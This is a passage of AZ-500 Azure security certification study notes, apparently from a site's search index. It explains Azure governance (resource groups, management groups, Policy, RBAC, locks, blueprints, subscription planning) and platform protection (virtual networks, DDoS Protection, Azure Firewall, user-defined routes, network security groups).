        Resource Groups - There are some important factors to consider when defining your resource group:

        • All the resources in your group should share the same lifecycle. You deploy, update, and delete them together. If one resource, such as a database server, needs to exist on a different deployment cycle it should be in another resource group.
        • Each resource can only exist in one resource group.
        • You can add or remove a resource to a resource group at any time.
        • You can move a resource from one resource group to another group.
        • A resource group can contain resources that are located in different regions.
        • A resource group can be used to scope access control for administrative actions.
        • A resource can interact with resources in other resource groups. This interaction is common when the two resources are related but don't share the same lifecycle (for example, web apps connecting to a database).
        • If the resource group's region is temporarily unavailable, you can't update resources in the resource group because the metadata is unavailable. The resources in other regions will still function as expected, but you can't update them.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#52-management-groups","title":"5.2. Management Groups","text":"
        • Provide user access to multiple subscriptions
        • Allows for new organizational models and logically grouping of resources.
        • Allows for single assignment of controls that applies to all subscriptions.
        • Provides aggregated views above the subscription level.

        Mirror your organization's structure - Create a flexible hierarchy that can be updated quickly. - The hierarchy does not need to model the organization's billing hierarchy. - The structure can easily scale up or down depending on your needs.

        Apply policies or access controls to any service - Create one RBAC assignment on the management group, which will inherit that access to all the subscriptions. - Use Azure Resource Manager integrations that allow integrations with other Azure services: Azure Cost Management, Privileged Identity Management, and Microsoft Defender for Cloud.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#53-azure-policies","title":"5.3. Azure policies","text":"

        Configure Azure policies - Azure Policy is a service you use to create, assign, and manage policies. These policies enforce different rules and effects over your resources so that those resources stay compliant with your corporate standards and service level agreements.

        The\u00a0first pillar\u00a0is around\u00a0real-time enforcement and compliance assessment.

        The\u00a0second pillar\u00a0of policy is\u00a0applying policies at scale\u00a0by leveraging Management Groups. There also is the concept called\u00a0policy initiative\u00a0that allows you to group policies together so that you can view the aggregated compliance result. At the initiative level there's also a concept called exclusion where one can exclude either the child management group, subscription, resource group, or resources from the policy assignment.

        The\u00a0third pillar\u00a0of your policy is\u00a0remediation by leveraging a remediation policy\u00a0that will automatically remediate the non-compliant resource so that your environment always stays compliant. For existing resources, they will be flagged as non-compliant but they won't automatically be changed because there can be impact to the environment.

        Some built-in roles in Azure Policy resources:

        • Resource Policy Owner
        • Resource Policy Contributor
        • Resource Policy Reader

        There are two resource providers for Azure Policy operations (or permissions):

        • Microsoft.Authorization
        • Microsoft.PolicyInsights

        If a custom policy is needed these are the steps:

        • Identify your business requirements
        • Map each requirement to an Azure resource property
        • Map the property to an alias
        • Determine which effect to use
        • Compose the policy definition

        Let's do it:

        • Policy definition\u00a0- Every policy definition has conditions under which it's enforced. And, it has a defined effect that takes place if the conditions are met.
        • Policy assignment\u00a0- A policy definition that has been assigned to take place within a specific scope. This scope could range from a management group to an individual resource. The term scope refers to all the resources, resource groups, subscriptions, or management groups that the policy definition is assigned to.
        • Policy parameters\u00a0- They help simplify your policy management by reducing the number of policy definitions you must create. You can define parameters when creating a policy definition to make it more generic.

        In order to easily track compliance for multiple resources, create and assign an\u00a0Initiative definition.

        All Policy objects, including definitions, initiatives, and assignments, will be readable to all roles over its scope. For example, a Policy assignment scoped to an Azure subscription will be readable by all role holders at the subscription scope and below.

        A\u00a0contributor\u00a0may trigger resource remediation but can't create or update definitions and assignments.\u00a0User Access Administrator\u00a0is necessary to grant the managed identity on\u00a0deployIfNotExists\u00a0or\u00a0modify\u00a0the assignment's necessary permissions.

        Each policy definition in Azure Policy has a single effect. That effect determines what happens when the policy rule is evaluated to match. The effects behave differently if they are for a new resource, an updated resource, or an existing resource.

        These effects are currently supported in a policy definition:

        • Append
        • Audit
        • AuditIfNotExists
        • Deny
        • DenyAction
        • DeployIfNotExists
        • Disabled
        • Manual
        • Modify
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#54-enable-role-based-access-control-rbac","title":"5.4. Enable Role-Based Access Control (RBAC)","text":"

        RBAC is an authorization system built on Azure Resource Manager that provides fine-grained access management of Azure resources. Each Azure subscription is associated with one Azure AD directory. Users, groups, and applications in that directory can manage resources in the Azure subscription. Grant access by assigning the appropriate RBAC role to users, groups, and applications at a certain scope. The scope of a role assignment can be a subscription, a resource group, or a single resource.

        Note that a subscription is associated with only one Azure AD tenant. Also note that a resource group can have multiple resources but is associated with only one subscription. Lastly, a resource can be bound to only one resource group.

        The four general built-in roles are:

        Built-in Role Description Contributor Grants full access to manage all resources, but does not allow you to assign roles in Azure RBAC, manage assignments in Azure Blueprints, or share image galleries. Owner Grants full access to manage all resources, including the ability to assign roles in Azure RBAC. Reader View all resources, but does not allow you to make any changes. User Access Administrator Lets you manage user access to Azure resources.

        If the built-in roles for Azure resources don't meet the specific needs of your organization, you can create your own custom roles. Just like built-in roles, you can assign custom roles to users, groups, and service principals at management group, subscription, and resource group scopes.

        Limits for custom roles.

        • Each directory can have up to\u00a05000\u00a0custom roles.
        • Azure Germany and Azure China 21Vianet can have up to 2000 custom roles for each directory.
        • You cannot set AssignableScopes to the root scope (\"/\").
        • You can only define one management group in AssignableScopes of a custom role. Adding a management group to AssignableScopes is currently in preview.
        • Custom roles with DataActions cannot be assigned at the management group scope.
        • Azure Resource Manager doesn't validate the management group's existence in the role definition's assignable scope.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#55-enable-resource-locks","title":"5.5. Enable resource locks","text":"

        You can set the lock level to\u00a0CanNotDelete or ReadOnly. In the portal, the locks are called\u00a0Delete and Read-only\u00a0respectively.

        • CanNotDelete\u00a0means authorized users can still read and modify a resource, but they can't delete the resource.
        • ReadOnly\u00a0means authorized users can read a resource, but they can't delete or update the resource. Applying this lock is similar to restricting all authorized users to the permissions granted by the Reader role.

        To create or delete management locks, you must have access to Microsoft.Authorization/*or\u00a0Microsoft.Authorization/locks/*\u00a0actions. Of the built-in roles, only\u00a0Owner\u00a0and\u00a0User Access Administrator\u00a0are granted those actions.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#56-deploy-azure-blueprints","title":"5.6. Deploy Azure blueprints","text":"

        Blueprints are a declarative way to orchestrate the deployment of various resource templates and other artifacts, such as:

        • Role Assignments
        • Policy Assignments
        • Azure Resource Manager templates
        • Resource Groups

        The Azure Blueprints service is supported by the globally distributed Azure Cosmos Data Base. Blueprint objects are replicated in multiple Azure regions. This replication provides\u00a0low latency,\u00a0high availability, and\u00a0consistent access\u00a0to your blueprint objects, regardless of which region Blueprints deploys your resources to.

        The Azure Resource Manager template gets used for deployments of one or more Azure resources, but once those resources deploy, there's no active connection or relationship to the template. Blueprints save the relationship between the blueprint definition and the blueprint assignment. This connection supports improved tracking and auditing of deployments. Each blueprint can consist of zero or more Resource Manager template artifacts. This support means that previous efforts to develop and maintain a library of Resource Manager templates are reusable in Blueprints.

        Blueprint definition - A blueprint is composed of\u00a0artifacts. Azure Blueprints currently supports the following resources as artifacts:

        Resource Hierarchy options Description Resource Groups Subscription Create a new resource group for use by other artifacts within the blueprint. These placeholder resource groups enable you to organize resources exactly how you want them structured and provide a scope limiter for included policy and role assignment artifacts and ARM templates. ARM template Subscription, Resource Group Templates, including nested and linked templates, are used to compose complex environments. Example environments: a SharePoint farm, Azure Automation State Configuration, or a Log Analytics workspace. Policy Assignment Subscription, Resource Group Allows assignment of a policy or initiative to the subscription the blueprint is assigned to. The policy or initiative must be within the scope of the blueprint definition location. If the policy or initiative has parameters, these parameters are assigned at the creation of the blueprint or during blueprint assignment. Role Assignment Subscription, Resource Group Add an existing user or group to a built-in role to make sure the right people always have the right access to your resources. Role assignments can be defined for the entire subscription or nested to a specific resource group included in the blueprint.

        Blueprint definition locations - When creating a blueprint definition, you'll define where the blueprint is saved. Blueprints can be saved to a\u00a0management group\u00a0or\u00a0subscription\u00a0that you have\u00a0Contributor access\u00a0to. If the location is a management group, the blueprint is available to assign to any child subscription of that management group.

        Blueprint parameters - Blueprints can pass parameters to either a\u00a0policy/initiative\u00a0or an\u00a0ARM template. When adding either\u00a0artifact\u00a0to a blueprint, the author decides to provide a defined value for each blueprint assignment or to allow each blueprint assignment to provide a value at assignment time.

        Assigning a blueprint definition to a management group means the assignment object exists in the management group. The deployment of artifacts still targets a subscription. To perform a management group assignment, the\u00a0Create\u00a0Or\u00a0Update REST API\u00a0must be used, and the request body must include a value for\u00a0properties.scope\u00a0to define the target subscription.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#57-design-an-azure-subscription-management-plan","title":"5.7. Design an Azure subscription management plan","text":"

        Capturing subscription requirements and designing target subscriptions include several factors which are based on:

        • environment type
        • ownership and governance model
        • organizational structure
        • application portfolios

        Organization and governance design considerations

        • Subscriptions serve as boundaries for Azure Policy assignments. - For example, in the Payment Card Industry.
        • Subscriptions serve as a scale unit so component workloads can scale within platform subscription limits.
        • Subscriptions provide a management boundary for governance and isolation that clearly separates concerns.
        • Create separate platform subscriptions for management (monitoring), connectivity, and identity when they're required.
        • Use manual processes to limit Azure AD tenants to only Enterprise Agreement enrollment subscriptions.
        • See the Azure subscription and reservation transfer hub for subscription transfers between Azure billing offers.

        Quota and capacity design considerations

        Azure regions might have a finite number of resources. As a result, available capacity and Stock-keeping units (SKUs) should be tracked for Azure adoptions involving a large number of resources.

        • Consider limits and quotas within the Azure platform for each service your workloads require.
        • Consider the availability of required SKUs within your chosen Azure regions.
        • Consider that subscription quotas aren't capacity guarantees and are applied on a per-region basis.
        • Consider reusing unused or decommissioned subscriptions.

        Tenant transfer restriction design considerations

        • Each Azure subscription is linked to a single Azure AD tenant, which acts as an identity provider (IdP) for your Azure subscription. The Azure AD tenant is used to authenticate users, services, and devices.
        • The Azure AD tenant linked to your Azure subscription can be changed by any user with the required permissions.

        Transferring to another Azure AD tenant is not supported for Azure Cloud Solution Provider (CSP) subscriptions.

        • With Azure landing zones, you can set requirements to prevent users from transferring subscriptions to your organization's Azure AD tenant.\u00a0Review the process in Manage Azure subscription policies. Configure your subscription policy by providing a list of exempted users. Exempted users are permitted to bypass restrictions set in the policy. An exempted users list is not an Azure Policy. You can only specify individual user accounts as exempted users, not Azure AD groups.
        • Consider whether users with Visual Studio/MSDN Azure subscriptions should be allowed to transfer their subscription to or from your Azure AD tenant.
        • Tenant transfer settings are only configurable by users with the Azure AD Global Administrator role assigned.

        • All users with access to Azure can view the policy defined for your Azure AD tenant.

          • Users can't view your exempted users list.
          • Users can view the global administrators within your Azure AD tenant.
        • Azure subscriptions transferred into an Azure AD tenant are placed into the default management group for that tenant.

        • If approved by your organization, your application team can define a process to allow Azure subscriptions to be transferred to or from an Azure AD tenant.

        Establish cost management design considerations

        • Cost transparency is a critical management challenge every large enterprise organization faces. T
        • Chargeback models, like Azure App Service Environment and Azure Kubernetes Service, might need to be shared to achieve higher density. Shared\u00a0platform as a service (PaaS)\u00a0resources can be affected by Chargeback models.
        • Use a shutdown schedule for nonproduction workloads to optimize costs.
        • Use Azure Advisor to check recommendations for optimizing costs.
        • Establish a charge back model for better distribution of cost across your organization.
        • Implement policy to prevent the deployment of resources not authorized to be deployed in your organization's environment.
        • Establish a regular schedule and cadence to review cost and right size resources for workloads.

        Organization and governance recommendations

        • Treat subscriptions as a unit of management aligned with your business needs and priorities.
        • Make subscription owners aware of their roles and responsibilities.
          • Do a quarterly or yearly access review for Azure AD Privileged Identity Management to ensure that privileges don't proliferate as users move within your organization.
          • Take full ownership of budget spending and resources.
          • Ensure policy compliance and remediate when necessary.
        • Reference the following principles as you identify requirements for new subscriptions:
          • Scale limits: Subscriptions serve as a scale unit for component workloads to scale within platform subscription limits. Large specialized workloads like\u00a0high-performance computing,\u00a0Internet of Things (IoT), and\u00a0System Analysis Program Development (SAP)\u00a0should use separate subscriptions to avoid running up against these limits.
          • Management boundary: Subscriptions provide a management boundary for governance and isolation, allowing a clear separation of concerns. Different environments, such as development, test, and production, are often removed from a management perspective.
          • Policy boundary: Subscriptions serve as a boundary for the Azure Policy assignments. For example, secure workloads like PCI typically require other policies in order to achieve compliance. The other overhead doesn't get considered if you use a separate subscription. Development environments have more relaxed policy requirements than production environments.
          • Target network topology: You can't share virtual networks across subscriptions, but you can connect them with different technologies like\u00a0virtual network peering or\u00a0Azure ExpressRoute. When deciding if you need a new subscription, consider which workloads need to communicate with each other.
        • Group subscriptions together under management groups, which are aligned with your management group structure and policy requirements. Grouping subscriptions ensures that subscriptions with the same set of policies and Azure role assignments all come from a management group.
        • Establish a dedicated management subscription in your\u00a0Platform\u00a0management group to support global management capabilities like Azure Monitor Log Analytics workspaces and Azure Automation runbooks.
        • Establish a dedicated identity subscription in your\u00a0Platform\u00a0management group to host Windows Server Active Directory domain controllers when necessary.
        • Establish a dedicated connectivity subscription in your\u00a0Platform\u00a0management group to host an\u00a0Azure Virtual WAN hub,\u00a0private Domain Name System (DNS),\u00a0ExpressRoute circuit, and other networking resources. A dedicated subscription ensures that all your foundation network resources are billed together and isolated from other workloads.
        • Avoid a rigid subscription model. Instead, use a set of flexible criteria to group subscriptions across your organization.

        Quota and capacity recommendations

        • Use subscriptions as scale units, and scale out resources and subscriptions as required. Your workload can then use the required resources for scaling out without hitting subscription limits in the Azure platform.
        • Use reserved instances to manage capacity in some regions. Your workload can then have the required capacity for high demand resources in a specific region.
        • Establish a dashboard with custom views to monitor used capacity levels, and set up alerts if capacity is approaching critical levels (90 percent CPU usage).
        • Raise support requests for quota increases under subscription provisioning, such as for total available VM cores within a subscription. Ensure that your quota limits are set before your workloads exceed the default limits.
        • Ensure that any required services and features are available within your chosen deployment regions.

        Automation recommendations

        • Build a Subscription vending process to automate the creation of Subscriptions for application teams via a request workflow as described in\u00a0Subscription vending.

        Tenant transfer restriction recommendations

        • Configure the following settings to prevent users from transferring Azure subscriptions to or from your Azure AD tenant:
          • Set Subscription leaving Azure AD directory to Permit no one.
          • Set Subscription entering Azure AD directory to Permit no one.
        • Configure a limited list of exempted users.
          • Include members from an Azure PlatformOps (platform operations) team.
          • Include break-glass accounts in the list of exempted users.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/","title":"II. Platform protection","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        This entire sections is about implementing security with a defense in depth approach in mind.

        • Azure Network Security Groups\u00a0can be used for basic layer 3 & 4 access controls between Azure Virtual Networks, their subnets, and the Internet.
        • Application Security Groups\u00a0enable you to define fine-grained network security policies based on workloads, centralized on applications, instead of explicit IP addresses.
        • Azure Web Application Firewall\u00a0and the\u00a0Azure Firewall\u00a0can be used for more advanced network access controls that require application layer support.
        • Local Admin Password Solution (LAPS)\u00a0or a third-party Privileged Access Management can set strong local admin passwords and just in time access to them.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#1-perimeter-security","title":"1. Perimeter security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#11-azure-networking-components","title":"1.1. Azure networking components","text":"

        Azure Virtual Networks are a key component of Azure security services. The Azure network infrastructure enables you to securely connect Azure resources to each other with virtual networks (VNets). A VNet is a representation of your own network in the cloud. A VNet is a logical isolation of the Azure cloud network dedicated to your subscription. You can connect VNets to your on-premises networks.

        Azure supports\u00a0dedicated WAN link connectivity\u00a0to your on-premises network and an Azure Virtual Network with ExpressRoute. The link between Azure and your site uses a dedicated connection that does not go over the public Internet.

        Virtual networks

        Virtual networks in Azure are network overlays that you can use to configure and control the connectivity among Azure resources, such as VMs and load balancers. A virtual network is scoped to a single Azure region. Virtual networks are made up of subnets. A subnet is a range of IP addresses within your virtual network. Subnets, like virtual networks, are scoped to a single Azure region. You can implement multiple virtual networks within each Azure subscription and Azure region. Each virtual network is isolated from other virtual networks. For each virtual network you can: - Specify a custom private IP address space using public and private addresses. Azure assigns resources in a virtual network a private IP address from the address space that you assign. - Segment the virtual network into one or more subnets and allocate a portion of the virtual network's address space to each subnet. - Use Azure-provided name resolution, or specify your own DNS server, for use by resources in a virtual network.

        IP addresses

        VMs, Azure load balancers, and application gateways in a single virtual network require unique Internet Protocol (IP) addresses the same way that clients in an on-premises subnet do. This enables these resources to communicate with each other: - Private\u00a0- A private IP address is dynamically or statically allocated to a VM from the defined scope of IP addresses in the virtual network. VMs use these addresses to communicate with other VMs in the same or connected virtual networks through a gateway / Azure ExpressRoute connection. These private IP addresses, or non-routable IP addresses, conform to RFC 1918. - Public\u00a0- Public IP addresses, which allow Azure resources to communicate with external clients, are assigned directly at the virtual network adapter of the VM or to the load balancer. Public IP address can also be added to Azure-only virtual networks. All IP blocks in the virtual network will be routable only within the customer's network, and they won't be reachable from outside. Virtual network packets travel through the high-speed Azure backplane.

        You can control the dynamic IP addresses assigned to VMs and cloud services within an Azure virtual network by specifying an IP addressing scheme.

        Subnets

        Each subnet contains a range of IP addresses that fall within the virtual network address space. Subnetting hides the details of internal network organization from external routers. Subnetting also segments the host within the network, making it easier to apply network security at the interconnections between subnets.

        Network adapters

        VMs communicate with other VMs and other resources on the network by using virtual network adapters. Virtual network adapters configure VMs with private and, optionally, public IP address. A VM can have more than one network adapter for different network configurations.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#12-azure-distributed-denial-of-service-ddos-protection","title":"1.2. Azure Distributed Denial of Service (DDoS) Protection","text":"

        Best practices for building DDoS-resilient services in Azure:

        1. Ensure that security is a priority throughout the entire lifecycle of an application, from design and implementation to deployment and operations. Applications might have bugs that allow a relatively low volume of requests to use a lot of resources, resulting in a service outage.

        For this, take into account these pillars: - Scalability - The ability of a system to handle increased load. - Availability - The proportion of time that a system is functional and working. - Resiliency - The ability of a system to recover from failures and continue to function. - Management - Operations processes that keep a system running in production. - Security - Protecting applications and data from threats

        2. Design your applications to scale horizontally to meet the demands of an amplified load\u2014specifically, in the event of a DDoS. If your application depends on a single instance of a service, it creates a single point of failure. Provisioning multiple instances makes your system more resilient and more scalable.

        For this, these are valid ways to address it: - For Azure App Service, select an App Service plan that offers multiple instances. - For Azure Cloud Services, configure each of your roles to use multiple instances. - For Azure Virtual Machines, ensure that your VM architecture includes more than one VM and that each VM is included in an availability set. We recommend using virtual machine scale sets for autoscaling capabilities.

        3. Layer security defenses in an application to reduce the chance of a successful attack. Implement security-enhanced designs for your applications by using the built-in capabilities of the Azure platform.

        This would be an approach to address it: Be aware that the risk of attack increases with the size, or surface area, of the application. You can reduce the surface area by using IP allowlists to close down the exposed IP address space and listening ports that aren\u2019t needed on the load balancers (for Azure Load Balancer and Azure Application Gateway). \u200eYou can also use NSGs to reduce the attack surface. You can use service tags and application security groups as a natural extension of an application\u2019s structure to minimize complexity for creating security rules and configuring network security.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#configure-a-distributed-denial-of-service-protection-implementation","title":"Configure a distributed denial of service protection implementation","text":"

        Azure Distributed Denial of Service (DDoS) protection, combined with application design best practices, provide defense against DDoS attacks. Azure DDoS protection provides the following service tiers:

        • Basic: Automatically enabled as part of the Azure platform. Always-on traffic monitoring, and real-time mitigation of common network-level attacks, provide the same defenses utilized by Microsoft's online services. The entire scale of Azure's global network can be used to distribute and mitigate attack traffic across regions. Protection is provided for IPv4 and IPv6 Azure public IP addresses.
        • Standard: Provides additional mitigation capabilities over the Basic service tier that are tuned specifically to Azure Virtual Network resources. DDoS Protection Standard is simple to enable, and requires no application changes. Protection policies are tuned through dedicated traffic monitoring and machine learning algorithms. Policies are applied to public IP addresses associated to resources deployed in virtual networks, such as Azure Load Balancer, Azure Application Gateway, and Azure Service Fabric instances, but this protection does not apply to App Service Environments. Real-time telemetry is available through Azure Monitor views during an attack, and for history. Rich attack mitigation analytics are available via diagnostic settings. Application layer protection can be added through the Azure Application Gateway Web Application Firewall or by installing a 3rd party firewall from Azure Marketplace. Protection is provided for IPv4 and IPv6 Azure public IP addresses.

        DDoS Protection Standard monitors actual traffic utilization and constantly compares it against the thresholds defined in the DDoS policy. When the traffic threshold is exceeded, DDoS mitigation is automatically initiated. When traffic returns to a level below the threshold, the mitigation is removed. During mitigation, DDoS Protection redirects traffic sent to the protected resource and performs several checks, including: - Helping ensure that packets conform to internet specifications and aren\u2019t malformed. - Interacting with the client to determine if the traffic might be a spoofed packet (for example, using\u00a0SYN Auth\u00a0or\u00a0SYN Cookie\u00a0or dropping a packet for the source to retransmit it). - Using rate-limit packets if it can\u2019t perform any other enforcement meth

        DDoS Protection blocks attack traffic and forwards the remaining traffic to its intended destination. Within a few minutes of attack detection, you\u2019ll be notified with Azure Monitor metrics. By configuring logging on DDoS Protection Standard telemetry, you can write the logs to available options for future analysis. Azure Monitor retains metric data for DDoS Protection Standard for 30 days.

        DDoS Protection Standard can mitigate the following types of attacks:

        • Volumetric attacks: The attack's goal is to flood the network layer with a substantial amount of seemingly legitimate traffic. It includes UDP floods, amplification floods, and other spoofed-packet floods. DDoS Protection Standard mitigates these potential multi-gigabyte attacks by absorbing and scrubbing them, with Azure's global network scale, automatically.
        • Protocol attacks: These attacks render a target inaccessible, by exploiting a weakness in the layer 3 and layer 4 protocol stack. It includes, SYN flood attacks, reflection attacks, and other protocol attacks. DDoS Protection Standard mitigates these attacks, differentiating between malicious and legitimate traffic, by interacting with the client, and blocking malicious traffic.
        • Resource (application) layer attacks: These attacks target web application packets, to disrupt the transmission of data between hosts. The attacks include HTTP protocol violations, SQL injection, cross-site scripting, and other layer 7 attacks. Use a Web Application Firewall, such as the Azure Application Gateway web application firewall, as well as DDoS Protection Standard to provide defense against these attacks. There are also third-party web application firewall offerings available in the Azure Marketplace.

        DDoS Protection Standard protects resources in a virtual network including public IP addresses associated with virtual machines, load balancers, and application gateways. When coupled with the Application Gateway web application firewall, or a third-party web application firewall deployed in a virtual network with a public IP, DDoS Protection Standard can provide full layer 3 to layer 7 mitigation capability.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#13-azure-firewall","title":"1.3. Azure Firewall","text":"

        Azure Firewall\u00a0is a managed, cloud-based network security service that protects your Azure Virtual Network resources. It\u2019s a fully stateful firewall-as-a-service with built-in high availability and unrestricted cloud scalability. By default, Azure Firewall blocks traffic.

        • Built-in high availability\u00a0- Because high availability is built in, no additional load balancers are required and there\u2019s nothing you need to configure.
        • Unrestricted cloud scalability\u00a0- Azure Firewall can scale up as much as you need, to accommodate changing network traffic flows so you don't need to budget for your peak traffic.
        • Application Fully Qualified Domain Name (FQDN) filtering rules\u00a0- You can limit outbound HTTP/S traffic to a specified list of FQDNs, including wild cards. This feature does not require SSL termination.
        • Network traffic filtering rules\u00a0- You can centrally create allow or deny network filtering rules by source and destination IP address, port, and protocol. Azure Firewall is fully stateful, so it can distinguish legitimate packets for different types of connections. Rules are enforced and logged across multiple subscriptions and virtual networks.
        • Qualified domain tags\u00a0- Fully Qualified Domain Names (FQDN) tags make it easier for you to allow well known Azure service network traffic through your firewall. For example, say you want to allow Windows Update network traffic through your firewall. You create an application rule and include the Windows Update tag. Now network traffic from Windows Update can flow through your firewall.
        • Outbound Source Network Address Translation (OSNAT) support\u00a0- All outbound virtual network traffic IP addresses are translated to the Azure Firewall public IP. You can identify and allow traffic originating from your virtual network to remote internet destinations.
        • Inbound Destination Network Address Translation (DNAT) support\u00a0- Inbound network traffic to your firewall public IP address is translated and filtered to the private IP addresses on your virtual networks.
        • Azure Monitor logging\u00a0- All events are integrated with Azure Monitor, allowing you to archive logs to a storage account, stream events to your Event Hub, or send them to Azure Monitor logs.

        Flow of rules for inbound traffic: Grouping the features above into logical groups reveals that Azure Firewall has three rule types:\u00a0NAT rules,\u00a0network rules, and\u00a0application rules. Network rules are applied first, then application rules. Rules are terminating, which means if a match is found in network rules, then application rules are not processed. If there\u2019s no network rule match, and if the packet protocol is HTTP/HTTPS, the packet is then evaluated by the application rules. If no match continues to be found, then the packet is evaluated against the infrastructure rule collection. If there\u2019s still no match, then the packet is denied by default.

        NAT rules - Inbound Destination Network Address Translation (DNAT). Filter inbound traffic with Azure Firewall DNAT using the Azure portal. DNAT rules are applied first. If a match is found, an implicit corresponding network rule to allow the translated traffic is added. You can override this behavior by explicitly adding a network rule collection with deny rules that match the translated traffic. No application rules are applied for these connections.

        Network rules - Grant access from a virtual network. You can configure storage accounts to allow access only from specific VNets. You enable a service endpoint for Azure Storage within the VNet. This endpoint gives traffic an optimal route to the Azure Storage service. The identities of the virtual network and the subnet are also transmitted with each request. Administrators can then configure network rules for the storage account that allow requests to be received from specific subnets in the VNet. Each storage account supports up to 100 virtual network rules, which could be combined with IP network rules.

        Application rules - Firewall rules to secure Azure Storage When network rules are configured, only applications requesting data from over the specified set of networks can access a storage account. An application that accesses a storage account when network rules are in effect requires proper authorization on the request. Authorization is supported with Azure AD credentials for blobs and queues, a valid account access key, or a SAS token. By default, storage accounts accept connections from clients on any network. To limit access to selected networks, you must first change the default action. Making changes to network rules can impact your applications' ability to connect to Azure Storage. Setting the default network rule to Deny blocks all access to the data unless specific network rules that grant access are also applied. Be sure to grant access to any allowed networks using network rules before you change the default rule to deny access.

        Controlling outbound and inbound network access is an important part of an overall network security plan. Network traffic is subjected to the configured firewall rules when you route your network traffic to the firewall as the default gateway.

        One way you can control outbound network access from an Azure subnet is with Azure Firewall. With Azure Firewall, you can configure:

        • Application rules that define fully qualified domain names (FQDNs) that can be accessed from a subnet.
        • Network rules that define source address, protocol, destination port, and destination address.

        Fully Qualified Domain Name (FQDN) tag: An FQDN tag represents a group of fully qualified domain names (FQDNs) associated with well known Microsoft services. You can use an FQDN tag in application rules to allow the required outbound network traffic through your firewall.

        Infrastructure qualified domain names: Azure Firewall includes a built-in rule collection for infrastructure FQDNs that are allowed by default. These FQDNs are specific for the platform and can't be used for other purposes. The following services are included in the built-in rule collection:

        • Compute access to storage Platform Image Repository (PIR)
        • Managed disks status storage access
        • Azure Diagnostics and Logging (MDS)

        You can monitor Azure Firewall using firewall logs. You can also use activity logs to audit operations on Azure Firewall resources. You can access some of these logs through the portal. Logs can be sent to Azure Monitor logs, Storage, and Event Hubs and analyzed in Azure Monitor logs or by different tools such as Excel and Power BI. Metrics are lightweight and can support near real-time scenarios making them useful for alerting and fast issue detection.

        Threat intelligence-based filtering can be enabled for your firewall to alert and deny traffic from/to known malicious IP addresses and domains. The IP addresses and domains are sourced from the Microsoft Threat Intelligence feed. Intelligent Security Graph powers Microsoft threat intelligence and is used by multiple services including Microsoft Defender for Cloud. If you've enabled threat intelligence-based filtering, the associated rules are processed before any of the NAT rules, network rules, or application rules. You can choose to just log an alert when a rule is triggered, or you can choose alert and deny mode. By default, threat intelligence-based filtering is enabled in alert mode.

        Rule processing logic: You can configure NAT rules, network rules, and applications rules on Azure Firewall. Rule collections are processed according to the rule type in priority order, lower numbers to higher numbers from 100 to 65,000. A rule collection name can have only letters, numbers, underscores, periods, or hyphens. It must begin with a letter or number, and end with a letter, number or underscore. The maximum name length is 80 characters.

        Service tags represent a group of IP address prefixes to help minimize complexity for security rule creation. Microsoft manages the address prefixes encompassed by the service tag, and automatically updates the service tag as addresses change. Azure Firewall service tags can be used in the network rules destination field. You can use them in place of specific IP addresses.

        Remote work support - Employees aren't protected by the layered security policies associated with on-premises services while working from home. Virtual Desktop Infrastructure (VDI) deployments on Azure can help organizations rapidly respond to this changing environment. However, you need a way to protect inbound/outbound Internet access to and from these VDI deployments. You can use Azure Firewall DNAT rules along with its threat intelligence-based filtering capabilities to protect your VDI deployments. Azure Virtual Desktop is a comprehensive desktop and app virtualization service running in Azure. It\u2019s the only virtual desktop infrastructure (VDI) that delivers simplified management, multi-session Windows 10, optimizations for Microsoft 365 ProPlus, and support for Remote Desktop Services (RDS) environments.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#14-configure-vpn-forced-tunneling","title":"1.4. Configure VPN forced tunneling","text":"

        You configure forced tunneling in Azure via virtual network User Defined Routes (UDR). Redirecting traffic to an on-premises site is expressed as a default route to the Azure VPN gateway. This example uses UDRs to create a routing table to first add a default route and then associate the routing table with your virtual network subnets to enable forced tunneling on those subnets.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#15-create-user-defined-routes-and-network-virtual-appliances","title":"1.5. Create User Defined Routes and Network Virtual Appliances","text":"

        A User Defined Routes (UDR) is a custom route in Azure that overrides Azure's default system routes or adds routes to a subnet's route table. In Azure, you create a route table and then associate that route table with zero or more virtual network subnets.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#2-network-security","title":"2. Network security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#21-network-security-groups-nsg","title":"2.1. Network Security Groups (NSG)","text":"

        Network traffic can be filtered to and from Azure resources in an Azure virtual network with a\u00a0network security group. A network security group contains security rules that allow or deny inbound network traffic to, or outbound network traffic from, several types of Azure resources. For each rule, you can specify source and destination, port, and protocol.

